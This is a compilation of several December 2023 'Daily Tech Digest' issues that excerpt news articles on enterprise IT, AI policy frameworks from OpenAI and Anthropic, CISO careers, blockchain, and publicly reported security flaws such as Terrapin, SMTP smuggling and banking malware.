Daily Tech Digest - December 22, 2023

Healthcare Organisations Embrace New Technologies to Fortify Cyber Defences

Healthcare organisations have begun partnering with others to develop security operations centres that monitor their traffic and identify threats. Proactive programmes such as threat hunting and brand monitoring have also gained favour. ... These initiatives are being taken keeping in mind the requirement from CERT-In to report cyber incidents within six hours, and new requirements under the Digital Personal Data Protection Act, 2023, which require organisations to take measures to identify sources of data, obtain consent, and manage the use and eventual destruction of data as per the guidelines given by the government. “Investments in advanced IAM technologies are becoming paramount, encompassing robust authentication methods, privileged access controls, and continuous monitoring of user activities,” says Pramod Bhaskar, CISO, Cross Identity. These measures align closely with regulatory changes and compliance requirements, as regulations like HIPAA increasingly emphasise the importance of secure user authentication, access governance, and audit trails in safeguarding patient information.


The Window of Exposure: A Critical Component of Your Cybersecurity Strategy

The goal of any responsible security professional is to reduce the window of exposure as much as possible. There are two basic approaches to this: limiting the amount of vulnerability information available to the public and reducing the window of exposure in time by issuing patches quickly. Limiting the amount of vulnerability information available to the public might work in theory, but it is impossible to enforce in practice. There is a continuous stream of research in security vulnerabilities, and most of this research results in public announcements. Hackers write new attack exploits all the time, and the exploits quickly end up in the hands of malicious attackers. While some researchers might choose not to publish a vulnerability they discover, public dissemination of vulnerability information is the norm because it is the best way to improve security. Reducing the window of exposure in time by issuing patches quickly is the other approach. Full-disclosure proponents publish vulnerabilities far and wide to spur vendors to patch faster. 


MLflow vulnerability enables remote machine learning model theft and poisoning

Many developers believe that services bound to localhost — a computer’s internal hostname — cannot be targeted from the internet. However, this is an incorrect assumption, according to Joseph Beeton, a senior application security researcher at Contrast Security, who recently gave a talk on attacking developer environments through localhost services at the DefCamp security conference. Beeton recently found serious vulnerabilities in the Quarkus Java framework and MLflow that allow remote attackers to exploit features in the development interfaces or APIs exposed by those applications locally. The attacks would only require the computer user to visit an attacker-controlled website in their browser, or a legitimate site where the attacker managed to place specially crafted ads. Drive-by attacks have been around for many years, but they are powerful when combined with a cross-site request forgery (CSRF) vulnerability in an application. In the past, hackers used drive-by attacks through malicious ads placed on websites to hijack the DNS settings of users’ home routers.


Chameleon Android Trojan Offers Biometric Bypass

The variant includes several new features that make it even more dangerous to Android users than its previous incarnation, including a new ability to interrupt the biometric operations of the targeted device, the researchers said. By disabling biometric access (facial recognition or fingerprint scans, for example), attackers can force a fallback to PIN or password entry, capture PINs, passwords, or graphical keys through keylogging functionality, and unlock devices using previously stolen PINs or passwords. "This functionality to effectively bypass biometric security measures is a concerning development in the landscape of mobile malware," according to Threat Fabric's analysis. ... The malware's key new ability to disable biometric security on the device is enabled by issuing the command "interrupt_biometric," which executes the "InterruptBiometric" method. The method uses Android's KeyguardManager API and AccessibilityEvent to assess the device screen and keyguard status, evaluating the state of the latter in terms of various locking mechanisms, such as pattern, PIN, or password.


The Rise of AI-Powered Applications: Large Language Models in Modern Business

AI and LLMs have fundamentally altered how people and organizations interact with technology. While they drive innovation and automation across multiple sectors simultaneously, they also change how professionals make decisions and communicate with customers. They have redefined industry-specific domains while enhancing industrial growth and innovation potential. With further development and research, it is only a matter of time before these AI-driven models can replicate the qualities of human speech and interaction. The ultimate extent of AI’s capabilities remains uncertain. While the potential for innovation and development seems endless, AI’s rapid growth in business and industry suggests that developers have only reached the tip of the iceberg. As AI functionalities become faster and more proficient, the healthcare, education, and financial service industries will thrive further and deliver trustworthy, reliable care and services for patients, students, and customers worldwide. Because LLMs offer operational support in data and analytics, there will be cost savings as professionals shift their time and effort elsewhere.


NIST Seeks Public Comment on Guidance for Trustworthy AI

This is the first time there has been an "affirmative requirement" for companies developing foundational models that pose a serious risk to national security, economic security, public health or safety to notify the federal government when training their models, and to share the results of red team safety tests, said Lisa Sotto, partner at Hunton Andrews Kurth and chair of the firm's global privacy and cybersecurity practice. This will have a "profound" impact on the development of AI models in the United States, she told Information Security Media Group. While NIST does not directly regulate AI, it helps develop frameworks, standards, research and resources that play a significant role in informing regulation and the technology's responsible use and development. Its artificial intelligence risk management framework, released earlier this year, seeks to provide a comprehensive framework for managing risks associated with AI technologies. Its recent report on bias in AI algorithms seeks to help organizations develop potential mitigation strategies, and the Trustworthy and Responsible AI Resource Center, launched in March, is a central repository for information about NIST's AI activities.


Why laptops and other edge devices are being AI-enabled

You can run them in the cloud, but as well as the inevitable latency this involves, it’s also increasingly costly in terms of both network bandwidth and cloud compute. There’s also the governance issue of sending all that potentially sensitive and bulky data to and fro. So at the very least, doing a first-cut filter to reduce and/or sanitise the transmitted data volume is valuable in all sorts of ways. You could use the GPU or even the CPU to do this filtering, and indeed that’s what some edge devices do today. Alternatively, you could simply run the inferencing work on the local CPU or GPU in your laptop or desktop. That works, but it’s slower. Not only can dedicated AI hardware such as an NPU do the job much faster, it will also be much more power-efficient. GPUs and CPUs doing this sort of work tend to run very hot, as evidenced by the big heatsinks and fans on high-end GPUs. That power efficiency is useful in a desktop machine, but is much more valuable when you’re running an ultraportable on battery, yet you still want AI-enhanced videoconferencing, speedy photo editing, or smoother gaming and AR.


Future of wireless technology: Key predictions for 2024

New IoT technology will help unify connectivity across multiple home devices, transforming home users’ experience with IoT devices. Matter, a new industry standard launched in 2023, provides reliable, secure connectivity across multiple device manufacturers. Given the weight of the players involved (e.g., Apple, Amazon, Google, Samsung SmartThings), we expect adoption of Matter-certified products to grow exponentially over the next three years, validating Wi-Fi’s central role in the smart connected home and buildings. Pilot projects and trials of TIP OpenWiFi will proliferate in developing countries and price-sensitive markets due to its cost-effectiveness and the benefits offered by an open, disaggregated model. Well-established wireless local-area network (WLAN) vendors will continue working to make themselves more cost-effective in these markets through massive investment in machine learning and AI and an integrated Wi-Fi + 5G offering for enterprises. Augmented and virtual reality will gain a larger share of our daily lives at home and work.


What developers trying out Google Gemini should know about their data

Google told ZDNET that it uses the API inputs and outputs to improve product quality. "Human review is a necessary step of the model improvement process," a spokesperson said. "Through review and annotation, trained reviewers help enable quality improvements of generative machine-learning models like the ones that power Google AI Studio and the Gemini Pro via the Gemini API." To protect developers' privacy, Google said their data is de-identified and disassociated from their API key and Google account, which is needed to log in to Google AI Studio. This takes place before reviewers can see or annotate the data. Google's Terms of Service (ToS) for its generative AI APIs further states that the data is used to "tune models" and may be retained in connection with the user's tuned models "[for] re-tuning when supported models change". The ToS states: "When you delete a tuned model, the related tuning data is also deleted." The terms also state that users should not submit sensitive, confidential, or personal data to the AI models.


14 in-demand cloud roles companies are hiring for

As cloud computing grows increasingly complex, the cloud architect has become a vital role for organizations navigating the implementation, migration, and maintenance of cloud environments. These IT pros can also help organizations avoid potential risks around cloud security while ensuring a smooth transition to the cloud across the company. With 65% of IT decision-makers choosing cloud-based services by default when upgrading technology, cloud architects will only become more important to enterprise success. ... DevOps engineers focus on blending IT operations with the development process to improve IT systems, acting as go-betweens who maintain the flow of communication between coding and engineering teams. It’s a role focused on the deployment of automated applications and the maintenance of IT and cloud infrastructure ... Security architects are responsible for designing, building, and implementing security solutions in the organization to keep IT infrastructure secure. For security architects working in a cloud environment, the focus is on designing and implementing security solutions that protect the business’ cloud-based infrastructure, data, and applications.



Quote for the day:

"The meaning of life is to find your gift. The purpose of life is to give it away." -- Anonymous

Daily Tech Digest - December 21, 2023

The New HR Playbook: Catalyze Innovation With Analytics And AI

Metaverse and blockchain technologies — underpinned by data and AI — also offer a lot of possibilities for improving HR practices. The metaverse, a shared virtual space bridging physical and digital realities, offers avenues for remote workspaces and virtual collaboration. It can enhance recruitment, onboarding, training, and development processes by providing immersive and interactive experiences that engage candidates and employees on a new level. The metaverse could also help companies with decentralized teams cultivate a strong organizational culture by giving employees a shared virtual space for interaction and engagement. Blockchain technology offers transparency and security that can have profound implications for HR processes. HR departments can use blockchain to improve the security of record-keeping, verify employee credentials, and simplify benefits administration. Blockchain can also streamline payroll processes, especially for international employees. Companies can even use blockchain to create decentralized, employee-driven platforms for collaboration and communication.


Why 2024 will be the year of the CISO

As the ESG/ISSA research indicates, many fed-up CISOs will retire, while others will move on to become virtual CISOs (vCISOs) or take field CISO positions with security technology vendors. We'll read numerous stories next year about CISOs up and quitting on the spur of the moment. While the reasons won't be disclosed, you can bet they are among those cited above. Competition for qualified candidates will be fierce. On a side note, I don't believe there is a significant population of next-generation CISO candidates with the right experience to step up. In 2024, we will augment our general discussion of the global cybersecurity skills shortage with a specific addendum about the CISO shortage. CISO pay and compensation will rise sharply. Aside from a handful of $1 million positions, CISOs aren't paid nearly as much as one might assume. Salary.com calculates a median salary of about $241,000, with 90% of CISOs making $302,000 or less. Given the job requirements (long hours, stress, being on call, etc.), this isn't very much. With the competition for candidates, firms will greatly increase base pay, perks, and bonuses, leading to hyper CISO salary inflation.


Hot Jobs in AI/Data Science for 2024

“The new and highly specialized role known as the ‘LLM Engineer’ is primarily found within organizations that have reached an advanced stage in their AI journey, having conducted numerous experiments but now facing challenges in the operationalization of their AI models at scale,” says Kjell Carlsson, head of data science strategy and evangelism at Domino Data Lab. ... “Some of the most sought-after AI positions today include machine learning engineer, AI engineer, and AI architect,” says Shmuel Fink, chair of the Master of Science in Data Analytics program at Touro University Graduate School of Technology. “Nevertheless, several other AI roles are also gaining prominence, such as AI ethicist, AI product manager, AI researcher, computer vision engineer, robotics engineer, and AI safety engineer. Moreover, there are positions that require industry-specific expertise, like a healthcare AI engineer.” Meanwhile, employees in any job role will become more valuable if they possess AI skills. As they gain those skills, some specialized job roles will evolve while others disappear.


How Blockchain Will Change Organizations

The fact that blockchain is a distributed database means it is very difficult to delete data: once something has been recorded on the blockchain, it becomes part of the permanent record. Data stored on a blockchain is immutable, meaning it cannot be changed or deleted, and this traceability is another key advantage of the technology. It can be useful for tracking the provenance of goods and tracing the origins of data, and it has implications for compliance, as organizations will be able to show exactly what data they have and where it came from. ... Under the traditional centralized model, organizations have complete control over the data they store. With blockchain technology, however, individuals retain control over their own data, because each user holds a private key that governs access to it. This control is a key advantage of blockchain: users can be confident that their data is safe and secure and that they can share it with whomever they choose.
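The immutability described above comes from hash chaining: each record embeds a hash of its predecessor, so altering any earlier entry invalidates every record after it. A minimal, illustrative Python sketch (not any particular blockchain's implementation, and with the HR-style records invented for the example):

```python
import hashlib
import json

def block_hash(block: dict) -> str:
    """Hash a block's contents, including the previous block's hash."""
    payload = json.dumps(block, sort_keys=True).encode()
    return hashlib.sha256(payload).hexdigest()

def build_chain(records):
    """Link each record to its predecessor by embedding the previous hash."""
    chain, prev = [], "0" * 64  # genesis predecessor
    for data in records:
        block = {"data": data, "prev": prev}
        prev = block_hash(block)
        chain.append(block)
    return chain

def verify(chain) -> bool:
    """Recompute every link; any edit to earlier data breaks the chain."""
    prev = "0" * 64
    for block in chain:
        if block["prev"] != prev:
            return False
        prev = block_hash(block)
    return True

chain = build_chain(["hired Alice", "issued credential", "ran payroll"])
assert verify(chain)
chain[0]["data"] = "hired Mallory"   # tamper with an early record
assert not verify(chain)             # tampering is immediately detectable
```

Real blockchains add consensus and digital signatures on top of this, but the detectability of tampering rests on exactly this kind of hash linkage.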


Industry Impact: Celebrating IT's Milestones and Achievements This Year

The integration of AI into various solutions, including observability, IT service management, and database solutions, has allowed for greater automation of the mundane tasks that often bog down IT pros and hinder organizations from accelerating their digital transformations. AI-powered capabilities free up valuable time for IT pros, allowing them to focus on the most important tasks at hand. Autonomous operations, enabled by purpose-built models for IT operations and large language models, are poised to revolutionize IT environments in the coming years, reducing operation costs and bettering the lives of those in the tech workforce. ... The IT industry has a smorgasbord of accomplishments that have enriched the digital lives of organizations this year. The industry’s cloud migration journey, in particular, has played a central role in allowing organizations to scale their operations and pivot rapidly in response to market conditions. The cloud journey has transformed the way businesses operate, offering scalability, flexibility, and cost-efficiency. 


An IT Carol: How the Ghosts of IT Past and Present Can Help Improve the Future

You see yourself sitting at your desk, frantically trying to juggle more service desk tickets than you ever thought were possible. The trip to the future also shows the vast number of new complex systems that teams are using. As applications, networks, databases, and infrastructures grew in complexity, so did the tools and solutions we need to manage them. This has created a future where IT pros are trying to navigate and manage some of the most complex systems and environments imaginable. Teams are more overworked than ever before. You spend so much time fighting fires that you have no time to build better technology that provides important new capabilities. You have almost no time to think about anything else, let alone spend the holiday with family or friends. Thankfully, this is not a future that has to be, but rather one we can avoid if we take the right steps today. Right now, we are on the path to improving the lives of IT teams through the integration of artificial intelligence (AI). IT solutions powered by AI, such as observability and ITSM, can help manage the complex IT environments we are witnessing through ongoing digital transformation and the move to the cloud.


Why data, AI, and regulations top the threat list for 2024

Some of the essential questions security teams ought to be asking themselves include: How do we manage and safeguard aspects like confidentiality, integrity, and availability of data? What strategies can we employ to protect our data against cyber threats and misuse? How do we address the security challenges that emerge with expanding data repositories? How do we differentiate between valuable data and redundant information? Furthermore, there’s often a misalignment in how data is structured versus the business framework. Consequently, security teams may need to engage in discussions with business units to clarify issues such as how we are applying our data. With whom is this data being shared? ... Although AI technologies aren’t new, the recent widespread adoption of AI has introduced a myriad of business and security challenges for organizations. Key questions to consider include: How do we monitor AI usage within the organization? How do we regulate the data shared with AI systems by employees? How do we ensure ongoing compliance with ethical standards and legal requirements?


2023 - The year of transformation and harmonisation

Millennial leaders bring a distinctively dynamic, digitalised approach to their roles, characterised by agility, openness, proactiveness, and hands-on engagement. Their adeptness at navigating the digital landscape allows them to forge strong connections within their predominantly Gen Z and millennial workforce. This workforce, in turn, embodies an informed, forward-looking, and tech-savvy ethos, driven by cutting-edge technologies that facilitate smart and efficient work practices. In the world of leading-edge technologies, the arrival of ChatGPT from OpenAI the preceding November continued to take centre stage. Throughout the year, competition and discussion surrounding AI, particularly generative AI, gained momentum. Amidst these discussions, Google's introduction of Bard added fervour to the debate, igniting intense conversations about the potential impact of generative AI on employment and the perceived threat to various job roles. This stirred a pot of mixed emotions: feelings of anxiety, uncertainty, and ambiguity swirled within the tech sphere.


Small businesses lead the way, while larger industries lag in tech adoption

On the other hand, many leaders in the small and mid-sized industrial sector are in the age group of 50 and above. When they initially embarked on their careers in the core industry, the adoption of IT and technology in their companies was significantly lower. Technology was not as pervasive, and IT integration was often considered an unnecessary expense. For those who did attempt computerisation in the early 2000s, the experience was often disheartening. Small IT companies that provided software solutions during that period often faced challenges and many even disappeared. The owners of these companies, faced with the uncertainty and challenges of running a technology-based business, opted for well-paying jobs instead. This experience left a lasting impact on their perception of technology and its role in business operations. Moreover, the proliferation of the internet and the rise of startups introduced a new paradigm. Many services and software were offered for free or at significantly reduced rates, fostering an expectation of inexpensive or cost-free technology solutions. This demotivated many software company owners from continuing in the business. 


What’s Ahead for AI In 2024: The Transformative Journey Continues

The coming year will see a shift in how generative AI is employed by businesses, with a greater emphasis on using organizational data. Companies are increasingly cautious about sharing sensitive data on public platforms, opting instead to host private foundation models within their four walls. This move is driven by concerns over data security and the desire to customize AI applications to specific organizational needs. By using their own data, companies can ensure that AI output is relevant and in context. This trend will lead to innovative applications of generative AI in a variety of business functions. ... New tuning techniques such as prompt tuning and retrieval augmented generation (RAG) will gain popularity next year. These methods provide more context-specific adjustments to AI models without the need for extensive retraining. Prompt tuning, for example, uses smaller pre-trained models to encode text prompts; RAG combines specific information with prompts to enhance the relevance of the model's output.
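The RAG pattern described above can be sketched in a few lines: retrieve the most relevant in-house documents for a query, then prepend them to the prompt so the model answers from that context. This is a toy illustration only; the corpus, names, and keyword-overlap scoring below are invented for the example, and a real deployment would use embedding-based retrieval and send the assembled prompt to the chosen foundation model.

```python
def retrieve(query: str, corpus: list[str], k: int = 2) -> list[str]:
    """Rank documents by naive keyword overlap with the query."""
    q = set(query.lower().split())
    scored = sorted(corpus,
                    key=lambda d: len(q & set(d.lower().split())),
                    reverse=True)
    return scored[:k]

def build_rag_prompt(query: str, corpus: list[str]) -> str:
    """Prepend the retrieved context so the model answers from it."""
    context = "\n".join(f"- {doc}" for doc in retrieve(query, corpus))
    return f"Answer using only this context:\n{context}\n\nQuestion: {query}"

# Hypothetical organizational documents kept inside the company's four walls.
corpus = [
    "Refunds are processed within 14 days of the return request.",
    "Our headquarters are located in Austin, Texas.",
    "Support is available Monday through Friday, 9am to 5pm.",
]

prompt = build_rag_prompt("How many days until refunds are processed", corpus)
# `prompt` would then be sent to the privately hosted foundation model.
```

The key point is that the model's output is grounded in retrieved organizational data rather than whatever the base model memorised during pretraining, without any retraining of the model itself.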



Quote for the day:

"People who avoid failure also avoid success.” -- Robert T. Kiyosaki

Daily Tech Digest - December 20, 2023

OpenAI announces ‘Preparedness Framework’ to track and mitigate AI risks

The announcement from OpenAI comes in the wake of several major releases focused on AI safety from its chief rival, Anthropic, another leading AI lab that was founded by former OpenAI researchers. Anthropic, which is known for its secretive and selective approach, recently published its Responsible Scaling Policy, a framework that defines specific AI Safety Levels and corresponding protocols for developing and deploying AI models. The two frameworks differ significantly in their structure and methodology. Anthropic’s policy is more formal and prescriptive, directly tying safety measures to model capabilities and pausing development if safety cannot be demonstrated. OpenAI’s framework is more flexible and adaptive, setting general risk thresholds that trigger reviews rather than predefined levels. ... Experts say both frameworks have their merits and drawbacks, but Anthropic’s approach may have an edge in terms of incentivizing and enforcing safety standards. From our analysis, it appears Anthropic’s policy bakes safety into the development process, whereas OpenAI’s framework remains looser and more discretionary, leaving more room for human judgment and error.


Australian federal government opens consultation on mandatory ransomware reporting obligation for businesses

The government is looking to develop legislation to "encourage" businesses to voluntarily provide information to the ASD and the Cyber Coordinator about a cyber incident, on a limited basis that would prevent the agencies from using this information for compliance action against the reporting organizations. The idea is to give more information than current regulation requires so the agencies can provide better support when businesses are under attack and can mitigate harms to individuals arising from cyber security incidents. ... Home Affairs is seeking input from industry on the design and implementation of a cyber incident review board (CIRB). It is proposed that the CIRB would conduct no-fault incident reviews to reflect on lessons learned from cyber incidents and share those lessons with the Australian public. The paper stated that the CIRB would not be a law enforcement, intelligence, or regulatory body. It would be allowed to request information related to a cyber incident but would not have powers to compel an organization to provide it.


US Lawmakers Urge Pushback on EU’s Big Tech Crackdown

CIOs, CISOs, and other IT leaders should keep a watchful eye on the EU's regulatory developments, Martha Heller, CEO at executive search firm Heller Search, tells InformationWeek. “The EU’s legislative move to curtail the power of US tech companies is a double-edged sword,” she says in an email interview. “Its mandate that the largest US-based tech companies give users more choice among services could give smaller technology companies a fighting chance. But its bias against US tech companies could limit the US’s ability to compete on the global market.” Heller adds, “As both producers and enterprise consumers of technology, CIOs and CTOs should pay close attention to the EU, as it leverages its watchdog position.” ... For CIOs, keeping track of regulatory considerations is not getting easier. “You have five big US tech companies that are primarily affected,” Chin-Rothmann says. “You must look at that in context with all of the other digital laws globally. It’s going to be a pretty complex regulatory patchwork. And when the EU regulates, other countries tend to follow suit.”


Web injections are back on the rise: 40+ banks affected by new malware campaign

Our analysis indicates that in this new campaign, threat actors’ intention with the web injection module is likely to compromise popular banking applications and, once the malware is installed, intercept the users’ credentials in order to then access and likely monetize their banking information. Our data shows that threat actors purchased malicious domains in December 2022 and began executing their campaigns shortly after. Since early 2023, we’ve seen multiple sessions communicating with those domains, which remain active as of this blog’s publication. Upon examining the injection, we discovered that the JS script is targeting a specific page structure common across multiple banks. When the requested resource contains a certain keyword and a login button with a specific ID is present, new malicious content is injected. Credential theft is executed by adding event listeners to this button, with an option to steal a one-time password (OTP) token with it. This web injection doesn’t target banks with different login pages, but it does send data about the infected machine to the server and can easily be modified to target other banks.
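The targeting logic the researchers describe can be sketched as a simple conditional check. The real module is JavaScript running in the victim's browser; the sketch below uses Python purely for illustration, and the keyword, button ID, and payload URL are hypothetical stand-ins, not the campaign's actual values.

```python
# Hypothetical markers standing in for the campaign's real keyword and button ID.
TARGET_KEYWORD = "login"
TARGET_BUTTON_ID = 'id="signin-submit"'

# Hypothetical second-stage script; the real one attaches event listeners to
# the login button to capture credentials (and optionally an OTP) on submit.
PAYLOAD = '<script src="https://attacker.example/inject.js"></script>'

def inject_if_targeted(url: str, page_html: str) -> str:
    """Mimic the malware's check: only tamper with pages matching both markers."""
    if TARGET_KEYWORD in url.lower() and TARGET_BUTTON_ID in page_html:
        return page_html.replace("</body>", PAYLOAD + "</body>")
    return page_html  # non-matching pages are left untouched

bank_page = '<body><button id="signin-submit">Sign in</button></body>'
news_page = "<body><h1>News</h1></body>"

assert PAYLOAD in inject_if_targeted("https://bank.example/login", bank_page)
assert inject_if_targeted("https://bank.example/news", news_page) == news_page
```

The same selectivity is why the injection generalises so easily: retargeting another bank is just a matter of swapping the keyword and button ID.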


New Malvertising Campaign Distributing PikaBot Disguised as Popular Software

The latest initial infection vector is a malicious Google ad for AnyDesk that, when clicked by a victim from the search results page, redirects to a fake website named anadesky.ovmv[.]net that points to a malicious MSI installer hosted on Dropbox. It's worth pointing out that the redirection to the bogus website only occurs after fingerprinting the request, and only if it's not originating from a virtual machine. "The threat actors are bypassing Google's security checks with a tracking URL via a legitimate marketing platform to redirect to their custom domain behind Cloudflare," Segura explained. "At this point, only clean IP addresses are forwarded to the next step." Interestingly, a second round of fingerprinting takes place when the victim clicks on the download button on the website, likely in an added attempt to ensure that it's not accessible in a virtualized environment. Malwarebytes said the attacks are reminiscent of previously identified malvertising chains employed to disseminate another loader malware known as FakeBat (aka EugenLoader).


SSH shaken, not stirred by Terrapin vulnerability

As the university trio put it this week, a successful Terrapin attack can "lead to using less secure client authentication algorithms and deactivating specific countermeasures against keystroke timing attacks in OpenSSH 9.5." In some very specific circumstances, it could be used to decrypt some secrets, such as a user's password or portions of it as they log in, but this is non-trivial and will pretty much fail in practice. Let's get to the nitty-gritty. We'll keep it simple; for the full details, see the paper. When an SSH client connects to an SSH server, before they've established a secure, encrypted channel, they will perform a handshake in which they exchange information about each other in plaintext. Each side has two sequence counters: one for received messages, and one for sent messages. Whenever a message is sent or received, the relevant sequence counter is incremented; the counters thus keep a running tally of the number of sent and received messages for each side. As a MITM attack, Terrapin involves injecting a plaintext 'ignore' message into the pre-secure connection, during the handshake, so that the client thinks it came from the server and increments its sequence counter for received messages. The message is otherwise ignored.
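The counter desynchronisation at the heart of Terrapin can be modelled with a toy simulation. This is a drastic simplification (no encryption, and message names are stand-ins for real SSH packet types), but it shows the essential trick: an injected ignore message plus a dropped packet leaves both counters in agreement while a handshake message has silently vanished.

```python
class Endpoint:
    """Toy SSH peer tracking sent/received sequence numbers (simplified)."""
    def __init__(self):
        self.sent = 0
        self.received = 0
        self.log = []

    def send(self, msg):
        self.sent += 1
        return msg

    def receive(self, msg):
        self.received += 1
        if msg != "IGNORE":          # SSH_MSG_IGNORE is silently discarded
            self.log.append(msg)

server, client = Endpoint(), Endpoint()

# Normal handshake traffic.
client.receive(server.send("KEXINIT"))

# MITM injects a plaintext IGNORE before encryption starts: the client's
# receive counter advances, but the server's send counter does not.
client.receive("IGNORE")

# The attacker then silently drops the next real handshake message;
# the counters line up again, so neither side notices the gap.
dropped = server.send("EXT_INFO")     # never delivered to the client
client.receive(server.send("NEWKEYS"))

assert client.received == server.sent     # counters agree...
assert "EXT_INFO" not in client.log       # ...yet a message disappeared
```

In the real attack the stripped packet carries security-relevant negotiation (such as the extension info enabling keystroke-timing countermeasures), which is how the downgrade described above is achieved without tripping the integrity checks.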


SMTP Smuggling Allows Spoofed Emails to Bypass Authentication Protocols

Using SMTP Smuggling, an attacker can send out a spoofed email purporting to come from a trusted domain and bypass the SPF, DKIM and DMARC email authentication mechanisms, which are specifically designed to prevent spoofing and its use in spam and phishing attacks. An analysis found that the attack technique could allow an attacker to send emails spoofing millions of domains, including ones belonging to high-profile brands such as Microsoft, Amazon, PayPal, eBay, GitHub, Outlook, Office365, Tesla, and Mastercard. The attack was demonstrated by sending spoofed emails apparently coming from the address ‘admin(at)outlook.com’. However, attacks against these domains are possible — or were possible, because some vendors have applied patches — due to the way a handful of major email service providers set up SMTP servers. The vendors identified by the researchers are GMX (Ionos), Microsoft and Cisco. The findings were reported to these vendors in late July. GMX fixed the issue after roughly 10 days. Microsoft assigned it a ‘moderate severity’ rating and rolled out a patch sometime in the middle of October.
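The excerpt doesn't spell out the underlying mechanism, but the research it describes hinges on servers disagreeing about what terminates an SMTP DATA section (normally CRLF-dot-CRLF). A toy sketch of that disagreement, assuming a permissive inbound server that also accepts a bare LF-dot-LF end-of-data sequence; the addresses and message text are invented for illustration:

```python
def split_messages(data_stream: str, terminator: str) -> list[str]:
    """Split a raw DATA stream on whatever this server treats as end-of-data."""
    return [m for m in data_stream.split(terminator) if m.strip()]

# One DATA payload containing a bare-LF end-of-data sequence in the middle.
payload = (
    "From: admin@trusted.example\r\n"
    "Subject: legit\r\n\r\nHello"
    "\n.\n"                                   # smuggled end-of-data sequence
    "From: admin@trusted.example\r\n"
    "Subject: spoofed\r\n\r\nPay this invoice"
)

# A strict server only recognises CRLF.CRLF, so it relays one message...
strict = split_messages(payload, "\r\n.\r\n")
# ...while a permissive receiver also honours LF.LF and sees two, the second
# of which was never evaluated by the outbound server's SPF/DKIM checks.
permissive = split_messages(payload, "\n.\n")

assert len(strict) == 1
assert len(permissive) == 2
```

The smuggled second message appears to originate from the trusted relay's infrastructure, which is why it sails past SPF, DKIM, and DMARC on the receiving side.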


Digital Transformation: Composable Applications And Micro-Engagements

Composable applications are characterized by one simple concept. Organizations are evolving beyond the method of integrating low-level services, and they’re gravitating to consuming higher-level micro-engagements. Micro-engagements are defined as small, repeatable experiences that can be preconfigured and consumed within a larger environment. Organizations are questioning why they need to re-create the wheel (or in this instance, the experience) using low-level services. Why can’t they simply leverage commonly repeatable experiences and lower their overall technical debt while increasing overall agility? ... Organizations that embrace the composable application mindset will be biased toward vendors who provide use cases or process-specific micro-engagements. Out-of-the-box micro-engagements can be quickly and easily discovered, evaluated, integrated, branded and deployed with minimal effort and risk, and vendors that provide no-code platforms can enable organizations to quickly and easily create their own reusable micro-engagements.


CISO: Your Tech Security Guide

Every business, regardless of size, necessitates a security leader overseeing technology, information, and data security, even if not designated as a CISO. While midsize and larger enterprises commonly appoint a CISO within their C-suite, smaller businesses may delegate such responsibilities to a tech executive like a director of cybersecurity. Some smaller or startup enterprises opt to outsource the CISO role, enhancing protection for their intellectual property, data, and IT infrastructure. ... A CISO’s contribution lies in their comprehensive understanding of security, connecting various security facets with the organization’s IT systems and networks. They leverage this perspective to pinpoint security risks and devise effective management strategies. Successful CISOs adeptly articulate complex security issues in layman’s terms, enabling leadership to grasp the implications. ... Becoming a CISO involves understanding cybersecurity’s technical foundations alongside practical management principles, encompassing people, processes, and technology. Critical attributes include a fervor for information technology, commitment to ongoing learning, adept leadership, familiarity with security standards, and relevant certifications (CISSP, CISM).


Is Your Product Manager Hurting Platform Engineering?

Having a product manager from day one can lower oxygen levels for your platform team. Feedback may be filtered, delayed or misunderstood, massively reducing its value and making good outcomes less likely. Platform engineers should bathe in the full, grainy details of the feedback and use it to enrich their understanding of the tasks their customers are trying to complete — and where they are underserved when completing those jobs. This helps the platform team create innovative solutions that may solve multiple unmet needs. You don’t have to use the Jobs To Be Done (JTBD) framework here. The crucial detail is that by immersing yourself in the customer’s needs, you can come up with ideas that solve many pain points instead of falling into the feature-factory trap of solving problem after problem. ... While it’s tempting to think ahead to what happens when your platform has achieved total adoption, been spun into a subsidiary organization, and had a conference named after it, it’s worth understanding that scale is not why you’ll add a product manager.



Quote for the day:

"Effective team leaders adjust their style to provide what the group can't provide for itself." -- Kenneth Blanchard

Daily Tech Digest - December 19, 2023

7 Security Trends to Watch Heading into 2024

Cyberattacks led by nation-state threat actors, as well as politically motivated hacktivist groups, will continue in relation to the active conflicts in Ukraine and Gaza. Vanderlee points out that attacks in these regions may have a higher likelihood of kinetic impact. For example, Sandworm, a threat actor linked with Russia, disrupted power in Ukraine, causing an outage in late 2022. “Those are definitely things to watch out for, particularly if you do business in those regions or in countries situated around those regions,” says Vanderlee. ... Cloud migration continues to be a significant theme in the IT space. As more organizations embrace a cloud-first approach, threat actors are looking for ways to target hybrid and multi-cloud environments. Mandiant observed threat actors targeting cloud environments and seeking ways to gain persistence and move laterally in 2023, according to Google Cloud’s Cybersecurity Forecast 2024. That trend is likely to bleed over into 2024; threat actors are going to look for ways to exploit cloud misconfigurations and move laterally across multi-cloud environments.


Internet's deep-level architects slam US, UK, Europe for pushing device-side scanning

Client-side scanning has since reappeared, this time on legislative agendas. And the IAB – a research committee for the Internet Engineering Task Force (IETF), a crucial group of techies who help keep the 'net glued together – thinks that's a bad idea. "A secure, resilient, and interoperable internet benefits the public interest and supports human rights to privacy and freedom of opinion and expression," the IAB declared in a statement just before the weekend. "This is endangered by technologies, such as recent proposals for client-side scanning, that mandate unrestricted access to private content and therefore undermine end-to-end encryption and bear the risk to become a widespread facilitator of surveillance and censorship." ... For the IAB and IETF, client-side scanning initiatives echo other problematic technology proposals – including wiretaps, cryptographic backdoors, and pervasive monitoring. "The IAB opposes technologies that foster surveillance as they weaken the user's expectations of private communication which decreases the trust in the internet as the core communication platform of today's society," the organization wrote.


Zombie Scrum First Aid

Zombie Scrum is on the rise! What may look like Scrum from a distance often turns out to be anything but Scrum when you take a closer look. Although teams go through the motions of Scrum, Sprints don’t result in valuable outcomes, customers are not involved, teams have little autonomy, and nobody is doing anything to improve. The first response to Zombie Scrum might be to panic, run around, and hide below your desk. That doesn’t usually work. So, for our book, the Zombie Scrum Survival Guide, we created a simple poster that tells you exactly what to do in clear and simple language. ... Complaints, cynicism, and sarcasm don’t help anyone. They may even contribute to teams sliding further into Zombie Scrum. Instead, highlight what works well, where improvements occur, and what is possible when you work together. Use humor to lighten the mood, but don’t sugarcoat the truth. Facilitate the next Sprint Retrospective with the Liberating Structure ‘Appreciative Interviews’. It helps identify enablers for success in less than one hour. By starting from what goes well — instead of what doesn’t — Appreciative Interviews liberate spontaneous momentum and insights for positive change as “hidden” success stories are uncovered.


On-prem vs cloud storage: Four decisions about data location

